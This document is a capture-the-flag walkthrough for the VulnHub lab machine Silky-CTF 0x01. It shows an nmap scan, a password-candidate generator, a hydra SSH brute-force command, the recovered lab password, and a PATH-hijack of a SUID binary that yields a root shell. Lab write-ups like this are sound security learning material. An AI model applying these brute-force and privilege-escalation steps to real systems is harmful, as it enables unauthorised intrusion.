you can download it here: https://www.vulnhub.com/entry/silky-ctf-0x01,306/

use nmap to do a thorough port scanning.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
root@kali:~# nmap -p 1-65535 -T4 -v -A 192.168.227.141
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-09 10:17 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:17
Completed NSE at 10:17, 0.00s elapsed
Initiating NSE at 10:17
Completed NSE at 10:17, 0.00s elapsed
Initiating ARP Ping Scan at 10:17
Scanning 192.168.227.141 [1 port]
Completed ARP Ping Scan at 10:17, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:17
Completed Parallel DNS resolution of 1 host. at 10:17, 0.01s elapsed
Initiating SYN Stealth Scan at 10:17
Scanning 192.168.227.141 [65535 ports]
Discovered open port 80/tcp on 192.168.227.141
Discovered open port 22/tcp on 192.168.227.141
Completed SYN Stealth Scan at 10:17, 2.05s elapsed (65535 total ports)
Initiating Service scan at 10:17
Scanning 2 services on 192.168.227.141
Completed Service scan at 10:17, 6.07s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.227.141
NSE: Script scanning 192.168.227.141.
Initiating NSE at 10:17
Completed NSE at 10:17, 0.10s elapsed
Initiating NSE at 10:17
Completed NSE at 10:17, 0.00s elapsed
Nmap scan report for 192.168.227.141
Host is up (0.0026s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 49:e6:fa:4c:d5:60:06:3b:c0:a8:c9:cc:00:10:7e:04 (RSA)
| 256 29:1b:39:69:32:aa:ae:9f:72:83:29:d4:27:db:f8:af (ECDSA)
|_ 256 a0:05:9e:82:bc:9d:09:ce:8e:c5:40:b2:b2:93:c6:53 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/notes.txt
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:CD:D8:28 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.203 days (since Sun Jun 9 05:25:28 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 2.61 ms 192.168.227.141

NSE: Script Post-scanning.
Initiating NSE at 10:17
Completed NSE at 10:17, 0.00s elapsed
Initiating NSE at 10:17
Completed NSE at 10:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.11 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

check its http service(port 80)

1

it’s just a default page for apache. check the notes.txt in robots.txt

2

3

there is credential leak? check the default page again and found this.

4

5

“s1lKy”, I guess that is the password(two characters missing), write a script to generate all possible passwords.

1
2
3
4
5
from string import *

for i in letters+digits+punctuation:
for j in letters+digits+punctuation:
print "s1lKy"+i+j

then use hydra to bruteforce the ssh password.

1
hydra -l silky -P pass.txt -t 8 192.168.227.141 ssh

actually I bruteforced the password for root at first but never get it, then I took a look at the vm machine and noticed that there is another user “silky”(it took me 4 hours in total just to bruteforce one password)

6

then I successfully get the password for silky: s1lKy#5

connect to ssh service

walked around and found something interesting in .bash_history

7

ok, go and check the sky.c, but not found, guess it was deleted, but found the compiled file /usr/bin/sky

8

have no idea what it is doing, download it and throw it to idapro.

9

1
2
3
4
5
int __cdecl main(int argc, const char **argv, const char **envp)
{
system("echo 'Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen. \ngezeichnet:'; whoami");
return 0;
}

quite clear. by modifying $PATH variables and get root shell.

1
2
3
4
echo "/bin/sh" > whoami
chmod +x whoami
PATH="/home/silky:$PATH"
/usr/bin/sky

10